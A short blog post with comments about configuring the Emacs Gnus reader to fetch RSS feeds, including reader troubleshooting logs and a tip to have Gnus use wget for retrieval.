Gnus, the Emacs mail/news/whatever reader, has built-in support for RSS, which, in theory should allow one to read blogs like this or LtU without having to leave the comfortable surroundings of Emacs.
The instructions at [old link: ] were good enough to get me going, but the result is quite unsatisfactory. Firstly, gnus throws a fit when trying to retrieve the RSS for this blog, though the LtU blog is fine. TonyG suggests this may be due to namespace prefixes. Secondly, the body of RSS feeds tends to be HTML, which looks hideous when rendered by Emacs.
So for the time being I’ll stick to web browsers for blog reading.
5 Comments
Or, there are dedicated RSS readers, my favourite of which is currently [Straw]().
I just tried your site on gnus 21.4.1. Works perfectly. I found your post because I’m having troubling reading a different wordpress rss feed, but yours works great. Otherwise gnus is by far the fastest way to deal with lots of rss feeds and, if you are comfortable with emacs, the most intuitive.
It still doesn’t work for me under XEmacs 21.4.19, Gnus v5.10.7
The error I am seeing in the
*Message-Log*buffer is
I got rid of that error by doing a
(require 'w3). Now I get the following in theMessage-Log`:
Contacting
Retrieval complete.
Parsed 100% of 405...done
XML-RPC is not available... not checking Syndic8.
nnrss: Failed to fetch nil
nnrss: Requesting lshift-blog...done
When selecting the
lshift-bloggroup Gnus just says “no messages”.
I finally got it to work! The trick is to set
mm-url-use-externalto
tso that emacs uses an external program, by default
wget, to fetch the feed, rather than its built-in http support.
|
https://tech.labs.oliverwyman.com/blog/2005/07/15/rss-via-gnus/
|
CC-MAIN-2020-24
|
refinedweb
| 302
| 75
|
Bit Shifting Operators Come to Synergy .NET
By Bob Studer, Senior Systems Software Engineer
Synergy DBL 10.1 on .NET adds two new operators for expressions: right bit shift ( >> ) and left bit shift ( << ). In combination with the other bitwise operators (|, &, etc.), shifting can access parts of fields that can be used to store flag data or to combine and extract small pieces of data. Bit shifts can be applied to Synergy decimal and integer types and some classes. They work by shifting, in bucket brigade fashion, the bits in the value on the left of the operator either to the left or the right by the number of bits specified by the value on the right of the operator. For example:
data x, i1, 3 data y, i1 y = x << 2
In this example the binary value of x is 00000011. Shifting that left by two bits changes the binary value to 00001100, which is 12 decimal. In effect, x was multiplied by 22, or 4. If a 1 bit is shifted into the high bit of a signed field, the value will be negative, and if a 0 is shifted into the high bit, the value will be positive. Any bits shifted out of the high end of the field will be lost; 0 bits are shifted into the low end of the field.
On the other hand, if x is shifted 1 bit to the right, as follows:
y = x >> 1
y will be set to 1. Thus, 00000011 becomes 00000001, in effect dividing x by 21, or 2. Any bits shifted out of the low end of the field will be lost, and bits that match the sign bit (the high-end bit) will be shifted in from the high end, so a negative value will stay negative, and a positive value will remain positive. This is called a sign-extending right shift.
Bit shifting is limited to integer types (i1, i2, i4, i8, int, short, long, and sbyte), Synergy decimal types (for example, d4), and classes that implement the op_RightShift or op_LeftShift operator methods. Synergy decimal types are first converted into integers before the shift is performed. The following example shows a class that implements the right shift operator:
namespace ns1 class fred public method fred arg, int proc val = arg end public property val, int method get endmethod method set endmethod endproperty public static method op_RightShift, @fred arg1, @fred arg2, int proc arg1.val = arg1.val >> arg2 ;Right shifts the val property mreturn arg1 end private myval, int endclass endnamespace proc data h, @fred, new fred(125) h = h >> 3 ;Calls the op_RightShift method console.writeline(h.val) end
In combination with the other bitwise operators, shifting can be used to set and access groups of bits within a single field. These bits can represent groups of flags or small values.
data combi, sbyte data b1, sbyte data b2, sbyte b1 = 3 b2 = 6 console.writeline(b1) console.writeline(b2) combi = ((b1 & 7) << 3) | (b2 & 7) b2 = (combi >> 3) & 7 b1 = combi & 7 console.writeline(b1) console.writeline(b2)
The above code swaps the values contained in b1 and b2. Swapping values this way demonstrates that you can access the two three-bit “subfields” of the combi field separately. ANDing b1 and b2 with 7 ensures that the incoming values won’t exceed the three bits allocated to the subfields. The value of b1 is shifted to the left 3 bits, and then the value of b2 is ORed into the lower three bits of combi. The next statements then extract the two three-bit fields, storing them in opposite fields to demonstrate that the values have been correctly retrieved.
You can see how bit shifts give you more control over individual bits within integer types. We think you’ll find them extremely useful. See “Bitwise operators” in the Synergy/DE documentation for more information.
|
http://synergex-testsite.com/bit-shifting-operators/
|
CC-MAIN-2020-40
|
refinedweb
| 650
| 68.5
|
A few functions for ID3v2 synch safe integer conversion. More...
Detailed Description
A few functions for ID3v2 synch safe integer conversion.
In the ID3v2.4 standard most integer values are encoded as "synch safe" integers which are encoded in such a way that they will not give false MPEG syncs and confuse MPEG decoders. This namespace provides some methods for converting to and from these values to ByteVectors for things rendering and parsing ID3v2 data.
Function Documentation
Convert the data from unsynchronized data to its original format.
Returns a 4 byte (32 bit) synchsafe integer based on value.
This returns the unsigned integer value of data where data is a ByteVector that contains a synchsafe integer (Structure, 6.2). The default length of 4 is used if another value is not specified.
|
http://taglib.github.io/api/namespaceTagLib_1_1ID3v2_1_1SynchData.html
|
CC-MAIN-2015-35
|
refinedweb
| 132
| 56.86
|
a cloning children prop. Overall, it was all the standard flow, where the parent passes the props to child components.
Today, we're spicing up the game and covering a bit more advanced themes - how the component can send information to the parent via props, and how components on the same level (under the same parent) can communicate by using props. Note that there are other, more advanced ways to realize communication between components (using more advanced ways to manage app state, like Redux), but in this article, we're talking about props only.
Note: As for all the previous articles, everything below also applies to React Native, as well!
Communication From Children to Parent
Props are passed in one direction only: from parent to children. However, this doesn't mean that the communication from children to the parent via props is impossible. It can be implemented using 'the basic flow': by passing the prop functions to children. These function props should act as callbacks.
So, let's say that we have a
ChildInput component:
class ChildInput extends Component { ... handleChange = (event) => { // This is functional setState! this.setState(() => { const newValue = event.target.value; this.props.updateParent(newValue); return { value: newValue, } }); } ... render() { return ( <input onChange={this.handleChange} placeholder={this.props.placeholder} type="text" value={this.state.value} /> ) } }
In our parent component, we get the information on value updates in input using a callback sent as an
updateParent prop:
class Parent extends Component { ... saveChange = (field) => (newValue) => { // do something with this field's newValue // for this example field is "username" // newValue is whatever is typed into input } ... render() { return ( <ChildInput placeholder={"Input field"} updateParent={this.saveChange("username")} /> ) } }
So, every time the user types something in information you need shouldn't belong to the child at all.
Communication Between Same Level Components
Direct communication between the two components that are on the same level via props is not possible. There is, however, a way, for the two same-level components to communicate via props - if these props can be contained and handled in new todo to our list:
class AddTodo extends Component { ... addItem = () => { this.props.addItem(this.state.todo} this.setState(() => { return { todo: '' }; }); } ... render() { return ( <div> <input onChange={this.handleChange} type="text" value={this.state.todo} /> <button onClick={this.addItem} > Add todo </button> </div> ) } }
For this to function properly, the
TodoPage component will have to know about the todo list, store it and update accordingly:
class TodoPage extends Component { constructor() { super(); this.state = { todoList: [] }; } ... addItem = (newItem) => { this.setState(({ todoList }) => { todoList.push(newItem); return { todoList, }; }); } ... render() { return ( <div> <AddTodo addItem={this.addItem} /> <TodoList items={this.state.todoList} /> </div> ); } }
When a new todo item is added to a list, the parent will be notified about it and update the state accordingly, thus notifying the
TodoList to rerender.
Let's take a look at another example, where we have a
ChildInput component (the same one that appeared previously in this article!), a Button and a Form, which is a parent. So we have conditions here: if the value of the input is empty, our button should be disabled, otherwise it'll be enabled.
Here's our
Button component:
class Button extends Component { render() { return ( <button disabled={this.props.disabled} > { this.props.text } </button> ); } }
Form will know the value of
ChildInput and pass it to
Button whether it's disabled based on this value:
class Form extends Component { constructor() { super(); this.state = { fieldValue: "" }; } ... handleInputChange = (fieldValue) => { this.setState(() => { return { fieldValue, }; }); } ... render() { return ( <div> <ChildInput placeholder={"Form input"} updateParent={this.handleInputChange} /> <Button disabled={!this.state.fieldValue} text={"Form button"} /> </div> ); } }
Keep in mind that for more complex!
Published at DZone with permission of Kristina Grujic , DZone MVB. See the original article here.
Opinions expressed by DZone contributors are their own.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }}
|
https://dzone.com/articles/react-guide-to-props-part-ii?fromrel=true
|
CC-MAIN-2019-18
|
refinedweb
| 631
| 50.43
|
Hi there ..... Just to let you know Cheatah no longer seems to compile against the latest CVS (using the namespace feature). I've managed to get my own module making tools to compile and link OK after adding the following (from addvs.cpp) - #ifndef NO_SWORD_NAMESPACE using sword::SWMgr; using sword::RawText; using sword::SWKey; using sword::VerseKey; using sword::ListKey; using sword::SWModule; #endif I don't know how to alter Cheatah - and I only use it to check out the library each time I rebuild, but I thought I ought to report it. God bless, Barry -- From Barry Drake (The Revd) minister of the Arnold and the Netherfield United Reformed Churches, Nottingham see and for our church homepages). Replies - b.drake@ntlworld.com
|
http://www.crosswire.org/pipermail/sword-devel/2002-October/016301.html
|
CC-MAIN-2014-42
|
refinedweb
| 124
| 59.98
|
- subroutines with the rest of Perl, creating a new executable. This situation is similar to Perl.
TUTORIAL
Now let's go on with the show!
EXAMPLE 1
Our first extension will be very simple. When we call the routine in the extension, it will print out a well-known message and return..t, and Changes.
The MANIFEST file contains the names of all the files just created in the Mytest directory.; use" #include "ppport to test that our extension works, we now need to look at the file) %
What has gone on?
The program h2xs is the starting point for creating extensions. In later examples we'll see how we can use h2xs to read header files and generate templates to connect to C routines.
h2xs creates a number of files in the extension directory. The file Makefile.PL is a perl script which will generate a true Makefile to build the extension. We'll take a closer look at it later.
The .pm and .xs files contain the meat of the extension. The .xs file holds the C routines that make up the extension. The .pm file contains routines that tell Perl how to load your extension.
Generating the Makefile and running
make created a directory called" ensures that you.
See perlmod for more information.
The
$VERSION variable is used to ensure that the .pm file and the shared library are "in sync" with each other. Any time you make changes to the .pm or .xs files, you should increment the value of this variable.
Writing good test scripts
The importance of writing good test scripts cannot be over-emphasized. You should closely follow the "ok/not ok" style that Perl itself uses, so that it is very easy and unambiguous to determine the outcome of each test case. When you find and fix a bug, make sure you add a test case for it..
EXAMPLE 3
Our third extension will take one argument as its input, round off that value, and set the argument to the rounded value. );
Running "
make test" should now print out that all nine tests are okay.
Notice that in these new test cases, the argument passed to round was a scalar variable. You might be wondering if you can round a constant or literal. To see what happens, temporarily add the following line to Mytest:
XS(XS_Mytest_round) { dXSARGS; if (items != 1) perlguts; we'll talk more later about what that "ST(0)" means in the section on the argument stack. C libraries. To begin with, we will build a small library of our own, then let h2xs write our .pm and .xs files for us. to the WriteMakefile call and the replacement of the postamble subroutine to cd into the subdirectory and run make. The Makefile.PL for the library is a bit more complicated, but not excessively so. Again we replaced the postamble subroutine to insert our own code. This code
With the completion of Example 4, we now have an easy way to simulate some real-life libraries whose interfaces may not be the cleanest in the world. We shall now continue with a discussion of the arguments passed to the xsubpp compiler.
When you specify.
Extending your Extension
Sometimes you might want to provide some extra methods or subroutines to assist in making the interface between Perl and your extension simpler or easier to understand. These routines should live in the .pm file. Whether they are automatically loaded when the extension itself is loaded orpage format, then placed in the blib directory. It will be copied to Perl's manpage directory when the extension is installed.
You may intersperse documentation and Perl code within the .pm file. In fact, if you want to use method autoloading, you must do this, as the comment inside the .pm file explains.
See perlpod for more information about the pod format.
Installing your Extension:))); }
You'll also need to add the following code to the top of the .xs file, just after the include of "XSUB.h":
#include <sys/vfs.h>
Also add the following code segment to Mytest.t while incrementing the "9" tests to "11":
@a = &Mytest::statfs("/blech"); ok( scalar(@a) == 1 && $a[0] == 2 ); @a = &Mytest::statfs("/"); is( scalar(@a), 7 ); Mytest.t, while incrementing the "11" tests to "13":
$results = Mytest::multi_statfs([ '/', '/blech' ]); ok( ref $results->[0]) ); ok( ! ref $results->api, perlxs, perlmod, and perlpod.
Author
Jeff Okamoto <okamoto@corp.hp.com>
Last Changed
2007/10/11
|
https://metacpan.org/pod/release/RJBS/perl-5.12.3-RC1/pod/perlxstut.pod
|
CC-MAIN-2017-09
|
refinedweb
| 748
| 75.71
|
The eagerly awaited Microsoft SDK for Kinect has been released - so we can now get on and develop all those innovative projects that it seems ideal for. In this article we look at how easy it is to start writing Kinect software using C#.
The first part is Getting started with Windows Kinect SDK 1.0
If you don't want to miss it subscribe to the RSS feed, follow us on Google+, Twitter, Linkedin or Facebook or sign up for our weekly newsletter.
The Microsoft official SDK for Kinect (updated to Beta 2) is easy to use. Basically you download it, plug the Kinect into a free USB socket and start programming. You can create applications in C#, VB or any .NET language including C++. Its only disadvantage is that it has a non-commercial licence which means you cannot use it to make any profit or even use it at all within a profit making organization. If all you want to do is explore the Kinect or have some fun then this is no big problem.
You also need to be running Windows 7 which is perhaps a bigger restriction.
As well as being easy to use the new SDK is also significantly more powerful than what you can find as open source - it has an improved body tracker and it supports the Kinect's sound hardware.
In this article we look at how easy it is to start writing software using C#.
First you need to prepare the hardware and this isn't without its difficulties. either select the 64-bit or 32-bit version. If in doubt download both as the installer won't let you install the wrong version. three Kinect devices in the Device Manager.
There is also a Kinect audio device listed under audio.
To check that they have worked try running the "Sample Skeletal Viewer" which.
Getting started with Kinect is fairly easy but there are some small things that might cause problems.
Start a new project - it doesn't matter really if it is a Windows Forms or WPF project but to make things easier let's start with.Research.Kinect.dll. Right click on the project in the project window and select Add Reference. Finding the Dll in the .NET tab can be difficult so click on the Component Name tab to put them into alphabetical order and scroll down to the Microsoft section.
The project has to target the x86 platform but in most cases this is the default so you shouldn't have to adjust anything.
To avoid having to type fully qualified names add:
using Microsoft.Research.Kinect.Nui;using Microsoft.Research.Kinect.Audio;
to the start of the code. You only need the one ending in Audio if you are going to use the audio features of the Kinect.
>
|
http://i-programmer.info/programming/hardware/2623-getting-started-with-microsoft-kinect-sdk.html
|
CC-MAIN-2014-15
|
refinedweb
| 473
| 72.05
|
chefkeiferMembers
Posts129
Joined
Last visited
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
chefkeifer's Achievements
0
Reputation
Basic LoaderMax tutorial by Zync
chefkeifer posted a topic in Loading (Flash)I have been following Zync's tutorial and have done everything he has done. As far as i know. I keep getting this error. TypeError: Error #1010: A term is undefined and has no properties. at main/xmlLoaded() at flash.events::EventDispatcher/dispatchEventFunction() at flash.events::EventDispatcher/dispatchEvent() at com.greensock.loading.core::LoaderCore/_completeHandler() at com.greensock.loading::XMLLoader/_completeHandler() at com.greensock.loading::XMLLoader/_receiveDataHandler() at flash.events::EventDispatcher/dispatchEventFunction() at flash.events::EventDispatcher/dispatchEvent() at flash.net::URLLoader/onComplete() here is my code. package { import com.greensock.events.*; import com.greensock.loading.*; import com.greensock.*; import flash.display.Sprite; import flash.display.MovieClip; import com.greensock.loading.XMLLoader; import com.greensock.events.LoaderEvent; import com.greensock.loading.LoaderMax; import com.greensock.loading.ImageLoader; import com.greensock.loading.data.ImageLoaderVars; import flash.display.MovieClip; import flash.text.TextField; import flash.events.MouseEvent; import com.greensock.loading.display.ContentDisplay; public class main extends Sprite { public var thumbHolder:MovieClip; public var mainHolder:MovieClip; public var titleTxt:TextField; public var descTxt:TextField; private var xImgList:XMLList; public function main() { //load in our xml var xPhotography:XMLLoader = new XMLLoader("xml/buggies.xml"); xPhotography.addEventListener(LoaderEvent.COMPLETE, xmlLoaded); xPhotography.load(); } private function xmlLoaded(e:LoaderEvent):void { var xData:XML = e.target.content; xImgList = new XMLList(xData.img); //Setup a loadermax object var thumbLoader:LoaderMax = new LoaderMax({name:"thumbLoader"}); thumbLoader.addEventListener(LoaderEvent.COMPLETE, thumbsLoaded); //setup variables for our imageLoader Vars var nImgWidth:Number = 150; var nImgHeight:Number = 100; var nMaxCols:Number = 2; for (var i:int = 0; 1 < xImgList.length(); i++) { var iLoad:ImageLoader = new ImageLoader("images/buggies/" + xImgList[i].@url, new ImageLoaderVars() .name(xImgList[i].@name) .width(nImgWidth) .height(nImgHeight) .smoothing(true) .container(thumbHolder) .x((i % nMaxCols) * nImgWidth) .y(int(i / nMaxCols) * nImgHeight) .scaleMode("proportionalOutside") .crop(true) .prop("index", i) .prop("url", xImgList[i].@url) .prop("title", xImgList[i].@title) .prop("desc", xImgList[i].@desc) .alpha(0) ) thumbLoader.append(iLoad); } thumbLoader.load(); } private function thumbsLoaded(e:LoaderEvent):void { //setup click events for our thumbnails for (var i:int = 0; 1 < xImgList.length(); i++) { var cdImg:ContentDisplay = LoaderMax.getContent("p" + (i+1)); cdImg.buttonMode = true; cdImg.addEventListener(MouseEvent.CLICK, thumbClick); TweenMax.to(cdImg, 1, {autoAlpha:1, delay:(i*0.2)} ); } } private function thumbClick(e:MouseEvent):void { var vars:Object = ImageLoader(e.currentTarget.loader).vars; trace(vars.title); checkOldImage(vars.index) } private function checkOldImage(index:Number):void { //check if theres alreayd an image loaded if(mainHolder.numChildren > 0) { var oldClip:Sprite = Sprite(mainHolder.getChildAt(0)); TweenMax.to(oldClip, 0.5, {autoAlpha:0, onComplete:function(){ mainHolder.removeChildAt(0); loadImage(index) } }); }else { loadImage(index); } } private function loadImage(index:Number):void { //Get filename var file:String = xImgList[index].@url; //change text display titleTxt.text = "Title:" + xImgList[index].@title; descTxt.text = "Description:" + xImgList[index].@desc; //setup our main image loader var mainLoad:ImageLoader = new ImageLoader("images/buggies/" + file, new ImageLoaderVars() .width(500) .height(500) .scaleMode("proportionalInside") .container(mainHolder) .smoothing(true) ) //setup event listeners mainLoad.addEventListener(LoaderEvent.COMPLETE, imageLoaded); mainLoad.load(); } private function imageLoaded(e:LoaderEvent):void { var imgClip:ContentDisplay = LoaderMax.getContent(e.currentTarget.name); TweenMax.to(imgClip, 0, {colorTransform: {exposure:2}} ); TweenMax.to(imgClip, 1.5, {colorTransform: {exposure:1}, autoAlpha:1} ); } } }
first node not showing properly
chefkeifer replied to chefkeifer's topic in Loading (Flash)thanks carl, that was a big help and stupid oversight on my part. As always it the little things that stump yor the longest time. I also figured out the columns with the following code just for future reference import columns:int = 2; var xPos:int = 0; var yPos:int = 0; var counter:int = 0; var item:buggieItem; for each(var xmlItem:XML in xmlItems) { item = new buggieItem(); addChild(item); item.title.text = xmlItem.title[0].text(); item.condition.text = xmlItem.condition[0].text(); item.model.text = xmlItem.model[0].text(); item.features.text = xmlItem.features[0].text(); item.salePrice.text = "$" + xmlItem.salePrice[0].text(); item.image.text = xmlItem.image[0].text(); item.x = xPos; item.y = yPos; counter++; if ( counter > ( columns - 1 ) ) { counter = 0; xPos = 0; yPos += 210;//item.height; } else { xPos += 545;//item.width; } } i am still need of some help if you dont mind. I need to know how to get the image to show up in each of them as well... i understand the xml part but i am not sure how to get that info from xml with just the dataLoader..do i need to do another imageLoader to get that to happen?
first node not showing properly
chefkeifer posted a topic in Loading (Flash)I am wondering why when the first node which is this item.title.text = xmlItem.title[0].text(); is in there causes an error and they overlap as well...not sure how to word that.. but when i comment that out all works just fine..the movieclip loops and with all the data from the xml work just. i have attached a working fla file i am also trying to figure it out how to get these to show up in two columns and not one continueous column thanks for your help http:// ... uggies.zip
SlideshowExample
chefkeifer posted a topic in Loading (Flash)Hey Jack, thanks for all you help in the past. but of course I still have issues. I am trying to bring in a swf from another folder that contains the SlideshowExample you create (its tweaked to fit my needs). All works seperatly, meaning when i test the seminole_photos1.fla it works just fine. When i test the fr_seminole.fla it works fine except when i click on the first photo icon to pull in that seminole_photos1.swf into fr_seminole.swf. I hope that makes sense. I am wondering if the folder structure is all out of wack. Not sure why the pictures one show up. this is the error i get when clicking on that first photo icon Loading error on XMLLoader 'loader0' (assets/data.xml): Error #2032: Stream Error. URL: i have tried every folder structure i can think and it still cant get any images to show here is a link to a scaled down fla folder package... http://
zoom
chefkeifer posted a topic in TransformManager (Flash)Is there a way to zoom upon the users mouseclick on the stage. for instance if the user click on certain part of the page it will then zoom from that point. Is transformAroundCenter the way to go about this?
- sorry Jack. i was unsure if you could or would download from my server... here is the zipped file with the html, css, flash, and the huge swf file thanks again for hanging with me. http://
- the reason i didnt upload the subloading file is because its 20megs...but i changed the file location to point to the url. here is my html. pretty plain and simple thanks for you help.
- i guess the reason you didnt see anything is that your probably using mozilla. for some reason that is the only browser nothing shows up in. Not sure why. anyway here is my fla.
- thanks again for you help and i have done my research and have come up with another issue...or course...thats me..ask my wife..just kidding...all works just fine except for when you the user goes to the page initianally...it acts a bit wierd...it uploads very huge...here is the link to see what i am talking about.. http:// ... .scene.php but if you minimize it all works just fine...as well when yo maximize again..it works just fine...its just when you first go to the site...not sure what the issue could be...i thought you could still have some insight...this is the code i have been using and learning from import com.greensock.layout.*; import flash.display.StageAlign; import com.greensock.*; import com.greensock.loading.*; import com.greensock.events.LoaderEvent; import com.greensock.loading.display.*; this.stage.align = StageAlign.TOP_LEFT; var ls:LiquidStage = new LiquidStage(this.stage, 1024, 853, 100, 100); var topArea:LiquidArea = LiquidArea.createAround(topBar_mc, {scaleMode:ScaleMode.WIDTH_ONLY}); topArea.pinCorners(ls.TOP_LEFT, ls.TOP_RIGHT); ls.attach(logo, ls.BOTTOM_RIGHT); ls.attach(archives, ls.TOP_LEFT); var magArea:LiquidArea = new LiquidArea(this, 150, 60, 1024, 700); var magLoader:SWFLoader = new SWFLoader("01.2011.karting.scene.swf", {name:"kartingScene", container:this, alpha:0, onProgress:progressHandler, onError:errorHandler, onComplete:completeHandler, onInit:onMagLoaded}); magLoader.load(); function progressHandler(event:LoaderEvent):void { trace("progress: " + event.target.progress); } function completeHandler(event:LoaderEvent):void { trace(event.target + " is complete!"); } function errorHandler(event:LoaderEvent):void { trace("error occured with " + event.target + ": " + event.text); } function onMagLoaded(event:LoaderEvent):void { magArea.attach(magLoader.content, {scaleMode:ScaleMode.PROPORTIONAL_INSIDE}); TweenLite.to(magLoader.content, 1, {alpha:1}); TweenMax.to(magLoader.content, 1, {dropShadowFilter:{color:0x000000, alpha:1, blurX:12, blurY:12}}); }
- thanks again Jack...i kept pulling from the wrong com folder...I will get this... one last question ...in this code what does the 400,400 refer too i know that the 800,800 is the width and height of my stage but not sure what the other is refering too var ls:LiquidStage = new LiquidStage(this.stage, 800, 800, 400, 400); also in this code i know that the 0,60 is the x and y coordinates for the magLoader but not sure what the 800,700 is refering too var magArea:LiquidArea = new LiquidArea(this, 0, 60, 800, 700); thanks again
- i tested the file you sent and i still get that coercion error Scene 1, Layer 'Layer 1', Frame 1, Line 14 1118: Implicit coercion of a value with static type Object to a possibly unrelated type String. Scene 1, Layer 'Layer 1', Frame 1, Line 35 1118: Implicit coercion of a value with static type Object to a possibly unrelated type String. i know i have the latest version because i just renewed jsut the other day. What could be the issue?
- I am Shockingly Green. i renewed the other day. I appreciate your help...
- not that new to AS but still learning. i am very new to the liquid stage part. i am using your loadSWF to load the swf which is in side of a movie clip. i have actaully started over since i posted this. and yes that code was copied and pasted. i use the example and was going to learn from it and tweak it. here is what i came up with when i started over. i still get that coersion error i have attached a fla
- also, is it better to make my whole project small with higher quality images and when it expands doesnt lose quality. or do i make it big and then have it scale down. I am at a loss fo where to start, even though i am almost done...lol
liquidStage
chefkeifer posted a topic in TransformManager (Flash)I am trying to do an online magazine. i made my layout in inDesign CS5 and exported it out to a swf. I have some code that imports the swf into my flash file. The problem i am having is that its too big for most browsers. right now i have my flash file setup as 1525x850 to fit the exported (inDesign) swf. I want to be able to scale if someones monitors size or browser size it smaller. How do i go about this ? i am using this code and i keep getting a coercion error import com.greensock.layout.*; //create a LiquidStage instance for the current stage which was built at an original size of 550x400 //don't allow the stage to collapse smaller than 550x400 either. var ls:LiquidStage = new LiquidStage(this.stage, 625, 400, 625, 400); //attach a "logo" Sprite to the BOTTOM_RIGHT PinPoint ls.attach(logo, ls.BOTTOM_RIGHT); //create a 300x100 rectangular area at x:50, y:70 that stretches when the stage resizes (as though its top left and bottom right corners are pinned to their corresponding PinPoints on the stage) var area:LiquidArea = new LiquidArea(this, 50, 70, 300, 100); //attach a "myImage" Sprite to the area and set its ScaleMode to PROPORTIONAL_OUTSIDE and crop the overspill area.attach(myImage, {scaleMode:ScaleMode.PROPORTIONAL_OUTSIDE, crop:true}); /"); }
|
https://greensock.com/profile/480-chefkeifer/
|
CC-MAIN-2022-27
|
refinedweb
| 2,055
| 52.36
|
Hello, Mike Jacquet here, and today I would like to discuss a fix that has been included in the released version of System Center 2012 Data Protection Manager (DPM) that enables End User Recovery (EUR) for file shares on the root of mountpoints to work properly.
In previous versions of DPM, if you protected a volume or share on a file server, and the share was on the root of a mounted volume, when clients tried looking for previous versions of files and folder located in the root of the target volume it would fail to show any.
To illustrate this, Figure-1 below shows a clustered protected file server called MJLC-ClusterFS with two Volumes. The H: drive labeled HOSTVOL is the HOST volume for a NTFS mountpoint. The folder H:\MountVol is the mountpoint for another volume labeled TARGET. The H:\MountVol folder is shared as MountVol, and client’s access data located on the TARGET volume via the network share \\MJLC-ClusterFS\Mountvol path.
MJLC-ClusterFS
H:\Mountvol –> Target
User Files…
User Folders
Figure-1
In figure-2 below, I show a Windows client mapped to a network drive X: which points to the \\mjlc-clusterfs\Mountvol share. When the user attempts to view Previous Versions of the file called targetfile.txt.txt located in the root of the mountpoint (TARGET), no previous versions are enumerated and instead you see "There are no previous versions available" message.
Figure-2
The root cause for this problem is due to the way that DPM creates the shares on the DPM Server when end user recovery is enabled. To overcome a possible path limitation, DPM creates all shares using a \\?\ prefix. Unfortunately, that prefix prevents vss shadow copies from being enumerated under mounted volumes.
Figure-3 details the shares on the DPM server. Looking specifically at the ones created by DPM for end user recovery, you will see they are prefixed with the \\?\ for the folder path. I have highlighted the problematic MountVol share. If you were to manually re-create the share without the \\?\ prefix DPM would overwrite it when the next synchronization job ran and it will put the \\?\ prefix back on the folder path and would result in the same problem.
Figure-3
SOLUTION
System Center 2012 Date Protection Manager supports a new registry key that you can add to prevent DPM from adding the \\?\ prefix when the end user recovery shares are created.
To allow previous versions to be listed for files located under shared mountpoints perform the following steps:
NOTE: Only shares that are created (re-created) after the registry key is added will no longer be prefixed.
1) On DPM 2012 RTM server make a new registry KEY called DiscardUNCPrefix under the following location:
HKLM\SOFTWARE\Microsoft\Microsoft Data Protection Manager\Configuration
Figure-4
2) On the DPM Server, open Computer Management. Under System Tools – Shared Folder – Shares – locate the share representing the mountpoint and “Stop Sharing” to delete it.
3) In the DPM Console, locate the volume or share that is being protected that represents the mountpoint and make a new recovery point. You can choose either the "Only Synchronize" , or the "Create a recovery point after synchronizing" option, but a synchronization job must be ran and complete successfully before the share will be re-made on the DPM Server.
Figure-6
4) After the new recovery point job completes, verify the share got re-created in Computer Management and no longer has the folder path that starts with the \\?\ prefix.
Figure-7
5) Test end user recovery on the client – it should now list previous versions for the files located under the shared mountpoint.
Figure-8
Now that the prefix was removed from the MountVol share on the DPM 2012 server, figure-8 confirms that previous versions are now working.
As of this writing, it is unclear if this fix will be back-ported for DPM 2010, however if it is I will update this post.
Mike
Great article. Fixed my problem that no previous version are shown, while there are previous version available in DPM server.
Here’s a collection of the top Microsoft Support solutions to the most common issues experienced
Thank you! This fix helped us solve issues with protected DFS namespace shares as well (DPM 2012) No previous versions where showing either!
|
https://blogs.technet.microsoft.com/dpm/2012/05/21/data-protection-manager-support-for-end-user-recovery-on-mountpoint-shares/
|
CC-MAIN-2017-26
|
refinedweb
| 724
| 59.33
|
Join devRant
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple APILearn More
Search - "types"
-
-
- The people who are developing the Hostbill billing platform: please stop. Quit your jobs, and go do something else because you fucking SUCK at your JOBS!
I've had it with your shitty API! You ever heard of scalar types beyond string? "1", "0", "false".. Learn to use TYPES even though it's PHP! THERE'S TYPE SUPPORT THERE NOW YOU FUCKING IMBECILES! Some are typed, some or not, you never know! Guess and win!
And don't get me started on the documentation, OR THE LACK OF! Having to contact customer support to figure out HOW IM SUPPOSED TO DISPATCH DATA TO THE API BECAUSE YOU CAN'T BE BOTHERED TO WRITE THE INTERFACES OR EXAMPLES! FUCK YOU
- There are 2 types of bosses:
Type 1: Who think you are avoiding work
Type 2: Who are not your bosses
- Had to do some website migrations from Drupal 7, which has EOL coming up this year, to Wordpress. I gave an estimate to customers that it will take around 25-50 hours to do this (per site). Simply because I had no idea. Took me 6-8 hours per site. The sites are so low traffic that I didn't even bother refactoring earlier code that much. Maybe tweak a few content types to make future maintenance easier.
Still gonna bill them for the minimum I gave them as an estimate. I still consider that number to be way lower than what some agencies would've billed any of 'em. I've seen the contracts some people have signed, paying for 120 hours of work, for a very simple content based site, where I could've done it in maybe 20 hours. So much air in those contracts, that I spend 10 minutes laughing at them.3
-.7
- "Pay more attention to the house"
Oh, really?
I'm working here!
Why every non tech person acts like I'm doing no fucking shit all day?
These types of things makes me want open my own fucking office.5
-
- CAN 👏 PEOPLE 👏 STOP 👏 ADDING 👏 `/// <reference lib="dom">` 👏 TO 👏 NODE.JS 👏 PACKAGES
It's a Node.JS package, for fuck's sake. But for SOME reason, sometimes to get around the lack of `URL` and `URLSearchParams` in @types/node, people keep including the *entire* DOM typings in their definition files/TypeScript files!
Sometimes I upgrade my deps in a Node.JS project and find that DOM typings have been added, causing errors when trying to use the global `URL`/`URLSearchParams` (I've shimmed these so that these (Node.JS versions) are in the global namespace). Then you have to search in all your dependencies for which one is including the DOM definitions.1
-
- Why the fuck do consultants / noob types LOVE using fucking props in react components. This app is complex, just make a fucking redux slice and use that. I'm not passing 23904 props to a component to get it to render. God13
- There are two types of people who attempted to learn programming:
Those who are disappointed because they tried but failed to become a programmer
Those who became programmer for real but disappointed anyway8
- My two main grudges against Typescript:
1) Union types can't be passed as arguments if there is a variant for every element of the union
2) No tuple polymorphism, i.e. [T, U] isn't assignable to [T]. This is not a mistake because the length of the arrays differs and therefore they may be interpreted in a different way, but IMO there should be a tuple type which is actually an array but length is unavailable and it supports polymorphism. This sounds stupid, but since function parameter lists work well with tuples it would actually enable a lot of functional tricks that are currently inaccessible.7
-
- me: <checking diff of code, types "diff">
comp: error in command provide filenames
me: wtf...
me: oh, "git diff"
me: What's the diff?
Could a diff diff if a diff did not diff code? What?1
-
- There are 10 types of people in this world: those who understand binary, and those who don't.
copied from
-
Top Tags
|
https://devrant.com/search?term=types
|
CC-MAIN-2022-27
|
refinedweb
| 719
| 72.97
|
*]
